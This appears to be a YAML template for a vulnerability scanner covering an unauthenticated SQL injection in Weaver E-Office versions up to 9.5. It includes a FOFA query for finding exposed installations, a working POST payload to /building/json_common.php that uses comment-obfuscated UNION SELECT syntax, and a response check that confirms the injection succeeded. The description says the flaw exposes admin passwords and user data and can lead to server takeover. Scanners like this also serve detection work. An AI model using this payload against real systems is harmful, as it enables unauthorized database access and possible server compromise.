product: 泛微E-Office
vName: 泛微E-Office json_common.php SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微e-office json_common.php、flow_xml.php、sms_page.php、getUserLists、detail.php、Init.php等接口处存在SQL注入漏洞，未经身份验证的恶意攻击者利用SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
version: e-office <=9.5
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/134675267
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /building/json_common.php
      data: tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,MD5(123456) ,4#|2|333
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and